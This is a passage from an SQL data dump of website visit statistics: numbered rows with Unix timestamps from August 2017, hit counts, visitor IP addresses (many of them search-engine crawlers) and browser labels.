2.77','other'),(145455,1502720922,1,0,1,0,'66.249.66.156',''),(145456,1502721310,1,1,0,0,'217.182.132.14','other'),(145457,1502721361,1,1,0,0,'217.182.132.87','other'),(145458,1502721857,1,1,0,0,'217.69.133.194','other'),(145459,1502721897,1,1,0,0,'178.154.200.7','other'),(145460,1502721914,1,0,1,0,'68.180.229.59',''),(145461,1502721970,1,1,0,0,'51.255.65.13','other'),(145462,1502722478,1,1,0,0,'77.121.190.255','chrome'),(145463,1502722802,2,2,0,0,'91.209.11.236','other'),(145464,1502723053,1,1,0,0,'51.255.71.116','other'),(145465,1502723313,1,1,0,0,'216.244.66.194','other'),(145466,1502723315,1,1,0,0,'141.8.142.21','other'),(145467,1502723806,1,1,0,0,'51.255.65.63','other'),(145468,1502723924,1,1,0,0,'141.8.142.107','other'),(145469,1502724714,1,1,0,0,'217.182.132.155','other'),(145470,1502724742,1,1,0,0,'51.255.65.78','other'),(145471,1502725119,3,3,0,0,'46.229.168.73','other'),(145472,1502725137,6,6,0,0,'46.229.168.68','other'),(145473,1502725155,4,4,0,0,'46.229.168.70','other'),(145474,1502725173,3,3,0,0,'46.229.168.65','other'),(145475,1502725192,8,8,0,0,'46.229.168.78','other'),(145476,1502725227,4,4,0,0,'46.229.168.69','other'),(145477,1502725246,3,3,0,0,'46.229.168.67','other'),(145478,1502725282,4,4,0,0,'46.229.168.71','other'),(145479,1502725307,1,0,1,0,'66.249.66.75',''),(145480,1502725367,1,1,0,0,'46.229.168.66','other'),(145481,1502725390,5,5,0,0,'46.229.168.72','other'),(145482,1502725427,7,7,0,0,'46.229.168.75','other'),(145483,1502725505,1,1,0,0,'178.154.200.27','other'),(145484,1502725552,7,7,0,0,'46.229.168.74','other'),(145485,1502725632,1,1,0,0,'217.182.132.70','other'),(145486,1502725696,7,7,0,0,'46.229.168.80','other'),(145487,1502725715,1,1,0,0,'178.154.200.7','other'),(145488,1502725805,5,5,0,0,'46.229.168.76','other'),(145489,1502725931,9,9,0,0,'46.229.168.79','other'),(145490,1502726029,1,1,0,0,'8.29.198.26','other'),(145491,1502726184,7,7,0,0,'46.229.168.69','other'),(145492,1502726192,1,1,0,0,'91.196.178.167','chrome'),(145493,1502726223,3,3,0,0,'46.229.168.77','other'),(145494,1502726292,3,3,0,0,'46.229.168.68','other'),(145495,1502726327,2,2,0,0,'46.229.168.67','other'),(145496,1502726375,5,5,0,0,'46.229.168.72','other'),(145497,1502726382,5,5,0,0,'46.229.168.75','other'),(145498,1502726454,4,4,0,0,'46.229.168.65','other'),(145499,1502726544,3,3,0,0,'46.229.168.71','other'),(145500,1502726589,1,1,0,0,'46.229.168.78','other'),(145501,1502726630,3,3,0,0,'46.229.168.66','other'),(145502,1502726635,2,2,0,0,'46.229.168.70','other'),(145503,1502726761,5,5,0,0,'46.229.168.80','other'),(145504,1502726854,1,1,0,0,'46.229.168.73','other'),(145505,1502727015,1,1,0,0,'5.45.207.64','other'),(145506,1502727171,1,1,0,0,'46.229.168.77','other'),(145507,1502727184,1,1,0,0,'46.229.168.79','other'),(145508,1502727270,4,4,0,0,'216.244.66.194','other'),(145509,1502727463,1,1,0,0,'141.8.183.1','other'),(145510,1502727605,1,1,0,0,'51.255.65.54','other'),(145511,1502727897,1,1,0,0,'51.255.71.133','other'),(145512,1502727941,1,1,0,0,'217.182.132.21','other'),(145513,1502728131,1,1,0,0,'109.63.147.181','msie'),(145514,1502728132,1,1,0,0,'37.112.239.78','msie'),(145515,1502728133,1,1,0,0,'93.80.148.52','msie'),(145516,1502728324,1,0,1,0,'66.249.66.76',''),(145517,1502728665,1,1,0,0,'51.255.65.72','other'),(145518,1502728698,1,1,0,0,'217.182.132.184','other'),(145519,1502728705,1,1,0,0,'157.55.39.205','other'),(145520,1502729542,1,1,0,0,'185.137.18.165','chrome'),(145521,1502729800,1,1,0,0,'217.182.132.83','other'),(145522,1502729809,8,8,0,0,'216.244.66.194','other'),(145523,1502729818,1,1,0,0,'51.255.65.71','other'),(145524,1502730883,1,1,0,0,'217.69.133.5','other'),(145525,1502731030,1,1,0,0,'217.182.132.67','other'),(145526,1502731079,1,1,0,0,'217.182.132.73','other'),(145527,1502731391,1,1,0,0,'180.76.15.154','other'),(145528,1502731741,1,1,0,0,'217.182.132.33','other'),(145529,1502732039,1,1,0,0,'91.196.178.40','chrome'),(145530,1502732355,1,1,0,0,'91.209.11.236','other'),(145531,1502732442,1,1,0,0,'37.190.163.241','chrome'),(145532,1502732503,1,1,0,0,'217.69.133.194','other'),(145533,1502732839,1,1,0,0,'217.182.132.37','other'),(145534,1502732875,1,1,0,0,'141.8.142.21','other'),(145535,1502732949,1,1,0,0,'51.255.65.16','other'),(145536,1502733224,1,1,0,0,'137.74.201.99','other'),(145537,1502733667,1,1,0,0,'51.255.65.62','other'),(145538,1502734050,1,1,0,0,'217.182.132.14','other'),(145539,1502734151,1,1,0,0,'51.255.65.21','other'),(145540,1502734516,1,1,0,0,'51.255.65.97','other'),(145541,1502734575,1,1,0,0,'151.80.27.118','other'),(145542,1502734585,1,0,1,0,'66.249.66.74',''),(145543,1502734845,1,1,0,0,'217.182.132.150','other'),(145544,1502734940,1,1,0,0,'40.77.167.60','other'),(145545,1502735291,1,1,0,0,'141.8.142.107','other'),(145546,1502735428,1,1,0,0,'51.255.65.52','other'),(145547,1502735551,5,5,0,0,'216.244.66.194','other'),(145548,1502736119,1,1,0,0,'217.182.132.50','other'),(145549,1502736242,1,1,0,0,'51.255.71.128','other'),(145550,1502736471,1,1,0,0,'217.182.132.170','other'),(145551,1502736665,1,0,1,0,'66.249.66.155',''),(145552,1502736811,1,1,0,0,'109.252.20.183','chrome'),(145553,1502736854,1,1,0,0,'8.29.198.25','other'),(145554,1502736986,1,1,0,0,'37.73.213.66','chrome'),(145555,1502737780,2,2,0,0,'91.209.11.236','other'),(145556,1502737876,1,1,0,0,'91.196.178.134','chrome'),(145557,1502738206,1,1,0,0,'217.182.132.187','other'),(145558,1502738208,1,1,0,0,'213.180.203.32','other'),(145559,1502738382,1,1,0,0,'91.196.178.34','chrome'),(145560,1502738392,6,6,0,0,'216.244.66.194','other'),(145561,1502738499,1,1,0,0,'141.8.142.21','other'),(145562,1502739133,1,1,0,0,'178.94.172.63','other'),(145563,1502739151,1,1,0,0,'51.255.65.28','other'),(145564,1502739220,1,1,0,0,'178.92.124.124','chrome'),(145565,1502739347,1,1,0,0,'194.42.113.95','other'),(145566,1502739593,1,1,0,0,'91.196.178.102','chrome'),(145567,1502739692,1,1,0,0,'157.55.39.174','other'),(145568,1502739801,1,1,0,0,'91.209.11.236','other'),(145569,1502740067,1,1,0,0,'217.182.132.70','other'),(145570,1502740826,1,1,0,0,'217.182.132.27','other'),(145571,1502741280,1,1,0,0,'164.132.162.188','other'),(145572,1502741329,1,1,0,0,'91.196.178.68','chrome'),(145573,1502741467,1,1,0,0,'51.255.71.121','other'),(145574,1502741530,1,1,0,0,'164.132.162.159','other'),(145575,1502741808,1,1,0,0,'137.74.207.110','other'),(145576,1502741904,1,1,0,0,'217.182.132.192','other'),(145577,1502741967,1,1,0,0,'216.244.66.237','other'),(145578,1502742747,1,0,1,0,'66.249.66.76',''),(145579,1502743413,2,2,0,0,'91.209.11.236','other'),(145580,1502743432,1,1,0,0,'217.69.133.194','other'),(145581,1502744776,1,1,0,0,'178.92.85.163','chrome'),(145582,1502745022,1,1,0,0,'217.182.132.15','other'),(145583,1502745069,1,1,0,0,'91.209.11.236','other'),(145584,1502745348,1,0,1,0,'66.249.66.75',''),(145585,1502745535,3,3,0,0,'216.244.66.194','other'),(145586,1502745619,1,1,0,0,'137.74.207.101','other'),(145587,1502745745,1,1,0,0,'51.255.65.94','other'),(145588,1502745769,1,1,0,0,'217.182.132.95','other'),(145589,1502746738,1,1,0,0,'51.255.65.10','other'),(145590,1502747087,1,1,0,0,'141.8.183.5','other'),(145591,1502747346,1,1,0,0,'51.255.65.58','other'),(145592,1502747569,1,1,0,0,'5.255.253.4','other'),(145593,1502747685,1,1,0,0,'8.29.198.26','other'),(145594,1502748561,1,1,0,0,'91.209.11.236','other'),(145595,1502749073,1,1,0,0,'51.255.65.89','other'),(145596,1502749237,1,1,0,0,'217.182.132.86','other'),(145597,1502749972,2,2,0,0,'216.244.66.194','other'),(145598,1502750392,1,1,0,0,'91.209.11.236','other'),(145599,1502750443,2,0,2,0,'66.249.66.155',''),(145600,1502750454,1,1,0,0,'40.77.167.9','other'),(145601,1502751461,1,1,0,0,'213.180.203.32','other'),(145602,1502751592,1,1,0,0,'137.74.207.164','other'),(145603,1502752052,1,1,0,0,'91.209.11.236','other'),(145604,1502753135,1,1,0,0,'51.255.65.79','other'),(145605,1502753452,1,1,0,0,'95.108.181.63','other'),(145606,1502753504,1,1,0,0,'91.209.11.236','other'),(145607,1502753630,1,1,0,0,'164.132.162.159','other'),(145608,1502753799,1,1,0,0,'213.180.203.32','other'),(145609,1502754048,1,0,1,0,'66.249.66.156',''),(145610,1502754151,1,1,0,0,'141.8.183.1','other'),(145611,1502754231,1,1,0,0,'51.255.65.33','other'),(145612,1502754281,1,1,0,0,'180.76.15.154','other'),(145613,1502755237,1,1,0,0,'141.8.183.1','other'),(145614,1502755324,1,1,0,0,'178.154.200.7','other'),(145615,1502755328,1,1,0,0,'37.9.113.94','other'),(145616,1502755546,9,9,0,0,'216.244.66.194','other'),(145617,1502755610,1,1,0,0,'5.9.138.93','firefox'),(145618,1502755828,1,0,1,0,'66.249.66.75',''),(145619,1502755883,1,1,0,0,'51.255.65.64','other'),(145620,1502757295,1,1,0,0,'212.55.74.17','other'),(145621,1502757328,1,1,0,0,'216.244.66.237','other'),(145622,1502757415,1,1,0,0,'162.210.196.98','other'),(145623,1502757453,1,1,0,0,'51.255.71.120','other'),(145624,1502757466,1,1,0,0,'141.8.142.21','other'),(145625,1502758109,10,10,0,0,'216.244.66.246','other'),(145626,1502758460,1,1,0,0,'217.69.133.3','other'),(145627,1502758518,1,1,0,0,'8.29.198.27','other'),(145628,1502758667,1,1,0,0,'128.72.188.233','chrome'),(145629,1502758831,1,1,0,0,'141.8.183.5','other'),(145630,1502758911,4,4,0,0,'216.244.66.194','other'),(145631,1502759263,1,1,0,0,'217.182.132.59','other'),(145632,1502759570,4,4,0,0,'216.244.66.246','other'),(145633,1502759945,1,1,0,0,'51.255.65.9','other'),(145634,1502760186,1,1,0,0,'217.182.132.58','other'),(145635,1502760201,1,1,0,0,'217.182.132.190','other'),(145636,1502760576,1,1,0,0,'37.9.113.138','other'),(145637,1502760688,1,1,0,0,'217.182.132.80','other'),(145638,1502761272,1,1,0,0,'141.8.183.1','other'),(145639,1502761514,1,1,0,0,'51.255.65.96','other'),(145640,1502761630,1,1,0,0,'137.74.207.188','other'),(145641,1502762073,1,1,0,0,'141.8.142.107','other'),(145642,1502762478,1,1,0,0,'46.229.168.69','other'),(145643,1502762644,1,1,0,0,'51.255.65.51','other'),(145644,1502763030,1,0,1,0,'66.249.66.157',''),(145645,1502763035,1,1,0,0,'79.164.59.144','msie'),(145646,1502763127,1,1,0,0,'137.74.201.108','other'),(145647,1502763279,1,1,0,0,'188.32.234.195','chrome'),(145648,1502764350,1,1,0,0,'141.8.183.5','other'),(145649,1502764492,1,1,0,0,'217.182.132.69','other'),(145650,1502764873,1,1,0,0,'40.77.167.122','other'),(145651,1502765396,1,1,0,0,'217.69.133.3','other'),(145652,1502765503,1,0,1,0,'66.249.66.75',''),(145653,1502765639,1,1,0,0,'217.182.132.25','other'),(145654,1502765962,1,1,0,0,'178.154.200.7','other'),(145655,1502766082,1,1,0,0,'164.132.162.154','other'),(145656,1502766425,1,1,0,0,'51.255.65.41','other'),(145657,1502766855,1,1,0,0,'141.8.183.5','other'),(145658,1502767004,1,1,0,0,'137.74.207.116','other'),(145659,1502767262,1,1,0,0,'40.77.167.9','other'),(145660,1502767282,1,1,0,0,'40.77.167.60','other'),(145661,1502767567,1,1,0,0,'213.180.203.32','other'),(145662,1502767584,1,1,0,0,'51.255.71.111','other'),(145663,1502767635,1,1,0,0,'178.92.251.126','chrome'),(145664,1502767718,1,1,0,0,'216.244.66.246','other'),(145665,1502767972,1,1,0,0,'51.255.65.53','other'),(145666,1502768074,1,1,0,0,'217.182.132.34','other'),(145667,1502768142,1,0,1,0,'66.249.66.76',''),(145668,1502768160,1,1,0,0,'217.182.132.82','other'),(145669,1502768222,1,1,0,0,'51.255.65.31','other'),(145670,1502768352,1,1,0,0,'178.154.200.7','other'),(145671,1502768715,1,1,0,0,'137.74.207.170','other'),(145672,1502768830,1,1,0,0,'217.182.132.19','other'),(145673,1502768883,6,6,0,0,'216.244.66.246','other'),(145674,1502769313,1,1,0,0,'51.255.65.55','other'),(145675,1502769343,1,1,0,0,'8.29.198.27','other'),(145676,1502769624,1,1,0,0,'141.8.183.1','other'),(145677,1502769731,1,1,0,0,'95.108.181.58','other'),(145678,1502769995,1,1,0,0,'137.74.201.108','other'),(145679,1502770093,3,3,0,0,'216.244.66.194','other'),(145680,1502771277,1,1,0,0,'217.69.133.3','other'),(145681,1502772336,1,1,0,0,'91.196.178.71','firefox'),(145682,1502772536,1,1,0,0,'217.182.132.52','other'),(145683,1502773202,1,1,0,0,'141.8.142.21','other'),(145684,1502773542,1,1,0,0,'141.8.142.107','other'),(145685,1502773764,1,1,0,0,'91.196.178.70','firefox'),(145686,1502774018,1,1,0,0,'217.182.132.171','other'),(145687,1502774264,1,1,0,0,'217.182.132.80','other'),(145688,1502774395,1,0,1,0,'66.249.66.75',''),(145689,1502774746,10,10,0,0,'213.251.184.38','other'),(145690,1502774818,1,1,0,0,'51.255.65.56','other'),(145691,1502775074,1,1,0,0,'216.244.66.246','other'),(145692,1502775112,1,1,0,0,'91.196.178.68','chrome'),(145693,1502775144,1,1,0,0,'91.196.178.162','chrome'),(145694,1502775287,1,1,0,0,'51.255.65.12','other'),(145695,1502775300,1,1,0,0,'91.196.178.67','chrome'),(145696,1502775638,5,5,0,0,'216.244.66.194','other'),(145697,1502775732,1,1,0,0,'217.182.132.29','other'),(145698,1502775766,1,1,0,0,'46.201.175.91','firefox'),(145699,1502776250,1,1,0,0,'91.196.178.70','chrome'),(145700,1502776312,1,1,0,0,'137.74.207.120','other'),(145701,1502776315,1,1,0,0,'91.210.109.222','firefox'),(145702,1502776406,1,1,0,0,'95.108.181.63','other'),(145703,1502776554,1,1,0,0,'178.154.171.59','other'),(145704,1502776586,1,1,0,0,'91.196.178.67','chrome'),(145705,1502776624,1,1,0,0,'51.255.71.111','other'),(145706,1502776976,1,1,0,0,'141.8.142.107','other'),(145707,1502777269,3,3,0,0,'216.244.66.194','other'),(145708,1502777344,1,1,0,0,'37.73.229.200','chrome'),(145709,1502777460,1,1,0,0,'137.74.203.194','other'),(145710,1502777870,1,1,0,0,'89.2.140.9','other'),(145711,1502778056,4,4,0,0,'216.244.66.246','other'),(145712,1502778075,1,1,0,0,'5.9.98.178','other'),(145713,1502778257,1,1,0,0,'217.182.132.50','other'),(145714,1502778419,1,1,0,0,'5.45.207.64','other'),(145715,1502778725,1,1,0,0,'51.255.65.2','other'),(145716,1502778740,1,1,0,0,'141.8.142.107','other'),(145717,1502778950,1,1,0,0,'95.108.181.69','other'),(145718,1502778978,1,1,0,0,'5.9.98.178','other'),(145719,1502779582,1,1,0,0,'213.180.203.32','other'),(145720,1502779666,1,1,0,0,'40.77.167.122','other'),(145721,1502779879,1,1,0,0,'5.9.98.178','other'),(145722,1502779893,1,1,0,0,'93.74.212.147','firefox'),(145723,1502780009,1,1,0,0,'217.182.132.191','other'),(145724,1502780170,1,1,0,0,'8.29.198.27','other'),(145725,1502780245,1,1,0,0,'95.132.12.53','chrome'),(145726,1502780623,1,0,1,0,'66.249.66.74',''),(145727,1502780780,1,1,0,0,'5.9.98.178','other'),(145728,1502780796,1,1,0,0,'85.115.62.180','chrome'),(145729,1502781104,1,1,0,0,'217.182.132.76','other'),(145730,1502781658,1,1,0,0,'40.77.167.60','other'),(145731,1502781662,1,1,0,0,'93.171.185.47','chrome'),(145732,1502781679,1,1,0,0,'95.108.181.69','other'),(145733,1502782091,1,1,0,0,'91.196.178.166','chrome'),(145734,1502782188,1,1,0,0,'216.244.66.246','other'),(145735,1502782294,1,1,0,0,'51.255.71.129','other'),(145736,1502782865,1,1,0,0,'46.133.132.154','other'),(145737,1502783029,1,1,0,0,'51.255.71.115','other'),(145738,1502783131,1,1,0,0,'217.182.132.183','other'),(145739,1502783515,1,1,0,0,'216.244.66.194','other'),(145740,1502783599,1,1,0,0,'40.77.167.122','other'),(145741,1502783680,1,1,0,0,'217.182.132.68','other'),(145742,1502783756,1,1,0,0,'94.179.246.23','chrome'),(145743,1502784660,1,1,0,0,'51.255.71.133','other'),(145744,1502785218,2,2,0,0,'216.244.66.246','other'),(145745,1502785650,1,0,1,0,'68.180.228.221',''),(145746,1502785766,1,1,0,0,'178.154.200.7','other'),(145747,1502786019,1,1,0,0,'5.45.207.64','other'),(145748,1502786064,3,3,0,0,'216.244.66.194','other'),(145749,1502786708,1,1,0,0,'217.182.132.5','other'),(145750,1502786785,1,1,0,0,'91.196.177.46','chrome'),(145751,1502786848,1,1,0,0,'217.182.132.36','other'),(145752,1502786904,1,1,0,0,'141.8.142.107','other'),(145753,1502786942,1,1,0,0,'40.77.167.122','other'),(145754,1502787089,1,1,0,0,'51.255.65.78','other'),(145755,1502787472,1,1,0,0,'80.254.155.43','chrome'),(145756,1502787691,1,1,0,0,'91.196.177.46','chrome'),(145757,1502787840,1,1,0,0,'217.182.132.17','other'),(145758,1502787843,1,1,0,0,'217.69.133.9','other'),(145759,1502788060,1,1,0,0,'91.196.178.70','firefox'),(145760,1502788244,1,1,0,0,'141.8.142.21','other'),(145761,1502788336,1,1,0,0,'180.76.15.34','other'),(145762,1502788459,1,1,0,0,'51.255.65.92','other'),(145763,1502789001,1,1,0,0,'51.255.65.35','other'),(145764,1502789326,1,1,0,0,'213.180.203.32','other'),(145765,1502789535,4,4,0,0,'216.244.66.246','other'),(145766,1502790438,1,1,0,0,'137.74.207.159','other'),(145767,1502790796,1,1,0,0,'213.186.202.27','chrome'),(145768,1502790895,1,1,0,0,'51.255.71.120','other'),(145769,1502790989,1,1,0,0,'8.29.198.27','other'),(145770,1502791188,1,1,0,0,'91.124.157.180','chrome'),(145771,1502791325,2,2,0,0,'164.132.162.153','other'),(145772,1502791395,1,1,0,0,'217.182.132.31','other'),(145773,1502791562,1,1,0,0,'178.154.200.7','other'),(145774,1502791783,1,1,0,0,'217.182.132.75','other'),(145775,1502792014,1,1,0,0,'141.8.183.5','other'),(145776,1502792062,1,1,0,0,'141.8.142.107','other'),(145777,1502792534,1,1,0,0,'51.255.71.116','other'),(145778,1502792789,1,1,0,0,'51.255.65.5','other'),(145779,1502793383,1,1,0,0,'217.69.133.4','other'),(145780,1502794006,1,1,0,0,'217.182.132.18','other'),(145781,1502794425,1,1,0,0,'141.8.183.5','other'),(145782,1502795180,1,1,0,0,'51.255.65.54','other'),(145783,1502795311,1,1,0,0,'213.180.203.32','other'),(145784,1502795914,1,0,1,0,'66.249.66.75',''),(145785,1502796438,1,1,0,0,'51.255.71.126','other'),(145786,1502796946,1,1,0,0,'216.244.66.246','other'),(145787,1502797288,1,1,0,0,'217.182.132.77','other'),(145788,1502797292,1,1,0,0,'217.182.132.176','other'),(145789,1502797459,1,1,0,0,'51.255.65.33','other'),(145790,1502797764,1,1,0,0,'40.77.167.60','other'),(145791,1502797872,1,1,0,0,'40.77.167.9','other'),(145792,1502798137,4,4,0,0,'216.244.66.194','other'),(145793,1502798381,1,1,0,0,'94.179.250.175','chrome'),(145794,1502798829,1,1,0,0,'40.77.167.122','other'),(145795,1502799087,1,1,0,0,'217.182.132.25','other'),(145796,1502799957,1,1,0,0,'188.226.148.40','chrome'),(145797,1502800094,1,1,0,0,'217.182.132.64','other'),(145798,1502800163,2,2,0,0,'216.244.66.246','other'),(145799,1502800264,1,1,0,0,'51.255.65.50','other'),(145800,1502800413,1,1,0,0,'92.112.248.3','chrome'),(145801,1502800447,3,3,0,0,'91.196.178.70','chrome'),(145802,1502800736,1,1,0,0,'51.255.65.52','other'),(145803,1502800777,1,1,0,0,'91.196.178.136','chrome'),(145804,1502801015,1,1,0,0,'217.182.132.51','other'),(145805,1502801192,1,1,0,0,'51.255.65.80','other'),(145806,1502801377,1,1,0,0,'51.255.65.95','other'),(145807,1502801518,1,1,0,0,'141.8.183.1','other'),(145808,1502801816,1,1,0,0,'8.29.198.26','other'),(145809,1502801943,1,0,1,0,'68.180.228.221',''),(145810,1502802200,1,1,0,0,'51.255.65.68','other'),(145811,1502802351,1,1,0,0,'217.69.133.2','other'),(145812,1502802478,1,1,0,0,'5.45.207.64','other'),(145813,1502802564,1,1,0,0,'91.196.178.67','chrome'),(145814,1502802702,1,1,0,0,'51.255.71.129','other'),(145815,1502802887,1,1,0,0,'51.255.65.62','other'),(145816,1502803031,1,1,0,0,'51.255.65.75','other'),(145817,1502803063,2,2,0,0,'91.209.11.236','other'),(145818,1502803198,1,1,0,0,'66.249.66.74','chrome'),(145819,1502803525,5,5,0,0,'46.2.107.147','other'),(145820,1502803660,1,0,1,0,'68.180.228.221',''),(145821,1502803729,1,1,0,0,'178.154.200.7','other'),(145822,1502803892,1,1,0,0,'51.255.65.92','other'),(145823,1502803934,1,1,0,0,'137.74.207.102','other'),(145824,1502804149,1,1,0,0,'180.76.15.136','other'),(145825,1502804549,1,1,0,0,'51.255.71.129','other'),(145826,1502804665,1,1,0,0,'91.196.178.68','firefox'),(145827,1502804764,1,1,0,0,'40.77.167.60','other'),(145828,1502804835,2,2,0,0,'141.8.183.5','other'),(145830,1502804863,1,1,0,0,'180.76.15.32','other'),(145831,1502805290,1,1,0,0,'91.209.11.236','other'),(145832,1502805570,2,2,0,0,'216.244.66.246','other'),(145833,1502805660,2,2,0,0,'46.2.107.147','other'),(145834,1502805742,1,1,0,0,'91.196.178.68','chrome'),(145835,1502805954,1,1,0,0,'54.165.59.7','other'),(145836,1502806205,1,1,0,0,'217.182.132.36','other'),(145837,1502806553,1,1,0,0,'51.255.71.110','other'),(145838,1502806684,1,1,0,0,'51.255.65.88','other'),(145839,1502806932,2,2,0,0,'141.8.183.5','other'),(145840,1502806979,5,5,0,0,'216.244.66.194','other'),(145841,1502807069,1,0,1,0,'66.249.66.157',''),(145842,1502807132,1,1,0,0,'185.182.81.78','chrome'),(145843,1502807549,1,1,0,0,'91.196.178.133','chrome'),(145844,1502808064,1,1,0,0,'66.249.93.204','chrome'),(145845,1502808065,1,1,0,0,'66.249.81.67','chrome'),(145846,1502808473,3,3,0,0,'216.244.66.246','other'),(145847,1502808568,1,1,0,0,'141.8.183.5','other'),(145848,1502808884,1,0,1,0,'68.180.228.221',''),(145849,1502809315,2,2,0,0,'216.244.66.194','other'),(145850,1502809382,1,1,0,0,'217.69.133.5','other'),(145851,1502809550,1,1,0,0,'217.182.132.59','other'),(145852,1502809582,1,1,0,0,'82.207.114.136','chrome'),(145853,1502809672,1,1,0,0,'40.77.167.122','other'),(145854,1502810308,1,1,0,0,'141.8.183.5','other'),(145855,1502810478,1,1,0,0,'51.255.65.79','other'),(145856,1502810677,1,1,0,0,'141.8.142.107','other'),(145857,1502810791,1,0,1,0,'66.249.66.155',''),(145858,1502810797,1,1,0,0,'37.73.229.200','chrome'),(145859,1502810827,1,1,0,0,'37.52.146.187','chrome'),(145860,1502811170,1,1,0,0,'217.182.132.27','other'),(145861,1502811242,1,1,0,0,'217.182.132.17','other'),(145862,1502811446,1,0,1,0,'68.180.228.221',''),(145863,1502811622,1,0,1,0,'66.249.66.156',''),(145864,1502812222,1,1,0,0,'217.182.132.81','other'),(145865,1502812230,1,1,0,0,'213.180.203.32','other'),(145866,1502812651,1,1,0,0,'8.29.198.27','other'),(145867,1502812675,1,1,0,0,'91.209.11.236','other'),(145868,1502812878,1,1,0,0,'141.8.183.1','other'),(145869,1502813066,1,1,0,0,'137.74.201.100','other'),(145870,1502813723,1,1,0,0,'213.169.74.137','chrome'),(145871,1502813986,1,1,0,0,'217.182.132.27','other'),(145872,1502813997,1,1,0,0,'217.182.132.79','other'),(145873,1502814087,1,1,0,0,'217.182.132.154','other'),(145874,1502814112,1,1,0,0,'91.209.11.236','other'),(145875,1502814276,1,1,0,0,'178.154.200.7','other'),(145876,1502814298,1,1,0,0,'208.90.57.196','firefox'),(145877,1502814462,1,0,1,0,'66.249.66.76',''),(145878,1502814625,1,1,0,0,'217.182.132.181','other'),(145879,1502814809,1,1,0,0,'51.255.65.36','other'),(145880,1502814849,1,1,0,0,'40.77.167.9','other'),(145881,1502815005,1,1,0,0,'51.255.65.48','other'),(145882,1502815394,1,0,1,0,'68.180.228.221',''),(145883,1502815523,1,1,0,0,'217.182.132.146','other'),(145884,1502815544,1,1,0,0,'91.209.11.236','other'),(145885,1502815621,1,1,0,0,'141.8.142.21','other'),(145886,1502816067,1,1,0,0,'213.180.203.32','other'),(145887,1502816311,5,5,0,0,'216.244.66.194','other'),(145888,1502816382,1,1,0,0,'80.70.77.131','chrome'),(145889,1502816409,1,1,0,0,'217.182.132.240','other'),(145890,1502816432,1,1,0,0,'91.196.178.35','chrome'),(145891,1502816837,1,0,1,0,'66.249.66.155',''),(145892,1502816845,1,1,0,0,'217.182.132.59','other'),(145893,1502816929,1,1,0,0,'141.8.183.1','other'),(145894,1502817251,1,1,0,0,'91.196.178.161','chrome'),(145895,1502817378,1,0,1,0,'66.249.66.75',''),(145896,1502818720,3,3,0,0,'216.244.66.246','other'),(145897,1502818767,1,1,0,0,'217.69.133.6','other'),(145898,1502819231,1,1,0,0,'5.45.207.32','other'),(145899,1502819289,1,1,0,0,'217.182.132.65','other'),(145900,1502820254,1,1,0,0,'180.76.15.34','other'),(145901,1502820820,1,1,0,0,'217.69.133.2','other'),(145902,1502820994,1,1,0,0,'141.8.142.21','other'),(145903,1502821031,1,1,0,0,'40.77.167.9','other'),(145904,1502821481,1,1,0,0,'157.55.39.34','other'),(145905,1502821494,1,1,0,0,'51.255.65.44','other'),(145906,1502822102,1,1,0,0,'217.182.132.182','other'),(145907,1502822213,1,1,0,0,'217.182.132.241','other'),(145908,1502822385,1,1,0,0,'216.244.66.246','other'),(145909,1502822919,1,1,0,0,'213.180.203.32','other'),(145910,1502823149,1,1,0,0,'217.182.132.79','other'),(145911,1502823499,1,1,0,0,'8.29.198.25','other'),(145912,1502824010,1,1,0,0,'51.255.65.45','other'),(145913,1502824206,2,2,0,0,'91.209.11.236','other'),(145914,1502824269,1,1,0,0,'217.69.133.5','other'),(145915,1502824368,1,1,0,0,'51.255.65.14','other'),(145916,1502824625,7,7,0,0,'216.244.66.246','other'),(145917,1502824717,1,1,0,0,'51.255.65.54','other'),(145918,1502825184,1,1,0,0,'217.182.132.93','other'),(145919,1502825459,1,1,0,0,'91.209.11.236','other'),(145920,1502825529,1,1,0,0,'195.34.74.119','other'),(145921,1502825563,1,1,0,0,'51.255.71.122','other'),(145922,1502825808,1,1,0,0,'217.69.133.2','other'),(145923,1502826132,1,1,0,0,'217.182.132.154','other'),(145924,1502826163,1,1,0,0,'51.255.65.41','other'),(145925,1502826559,1,1,0,0,'51.255.71.123','other'),(145926,1502826691,1,1,0,0,'141.8.142.21','other'),(145927,1502826735,1,1,0,0,'66.249.66.156','chrome'),(145928,1502827327,1,1,0,0,'51.255.65.55','other'),(145929,1502827803,1,1,0,0,'216.244.66.194','other'),(145930,1502828064,1,1,0,0,'217.182.132.153','other'),(145931,1502828214,1,1,0,0,'51.255.71.116','other'),(145932,1502828618,1,1,0,0,'217.182.132.88','other'),(145933,1502828723,1,0,1,0,'68.180.228.221',''),(145934,1502828959,2,2,0,0,'216.244.66.246','other'),(145935,1502828962,1,1,0,0,'91.209.11.236','other'),(145936,1502829095,1,1,0,0,'141.8.142.21','other'),(145937,1502829361,4,4,0,0,'216.244.66.194','other'),(145938,1502829500,1,1,0,0,'217.182.132.193','other'),(145939,1502829704,1,0,1,0,'66.249.66.75',''),(145940,1502830019,1,1,0,0,'213.180.203.32','other'),(145941,1502830334,64,64,0,0,'64.140.169.42','firefox'),(145942,1502830957,1,1,0,0,'217.182.132.90','other'),(145943,1502831323,2,2,0,0,'91.209.11.236','other'),(145944,1502831376,2,2,0,0,'213.180.203.32','other'),(145945,1502831626,1,1,0,0,'217.182.132.30','other'),(145946,1502831992,1,1,0,0,'217.182.132.54','other'),(145947,1502832573,1,1,0,0,'217.182.132.190','other'),(145948,1502833604,1,1,0,0,'137.74.207.188','other'),(145949,1502833911,1,1,0,0,'51.255.65.96','other'),(145950,1502834299,2,2,0,0,'216.244.66.246','other'),(145951,1502834335,1,1,0,0,'8.29.198.26','other'),(145952,1502834431,1,1,0,0,'51.255.65.28','other'),(145953,1502834503,1,1,0,0,'137.74.207.159','other'),(145954,1502835089,1,1,0,0,'137.74.203.194','other'),(145955,1502835210,1,1,0,0,'217.69.133.9','other'),(145956,1502835583,1,0,1,0,'66.249.66.156',''),(145957,1502835719,1,1,0,0,'141.8.142.21','other'),(145958,1502835924,1,1,0,0,'164.132.162.159','other'),(145959,1502835933,1,1,0,0,'91.209.11.236','other'),(145960,1502836149,1,1,0,0,'51.255.65.70','other'),(145961,1502837060,1,1,0,0,'51.255.65.48','other'),(145962,1502837088,1,1,0,0,'40.77.167.9','other'),(145963,1502837564,13,13,0,0,'216.244.66.194','other'),(145964,1502837744,1,1,0,0,'217.182.132.60','other'),(145965,1502838312,1,1,0,0,'141.8.183.1','other'),(145966,1502838326,1,1,0,0,'51.255.71.116','other'),(145967,1502838342,1,1,0,0,'40.77.167.9','other'),(145968,1502838368,1,1,0,0,'217.182.132.6','other'),(145969,1502839334,2,2,0,0,'216.